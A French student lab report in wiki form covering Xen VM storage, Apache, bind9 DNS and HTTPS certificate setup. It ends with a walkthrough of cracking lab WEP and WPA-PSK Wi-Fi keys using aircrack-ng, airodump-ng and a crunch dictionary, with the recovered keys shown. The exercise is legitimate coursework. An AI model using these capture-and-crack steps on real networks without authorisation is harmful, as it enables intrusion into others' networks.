      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      &lt;br /&gt;
&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
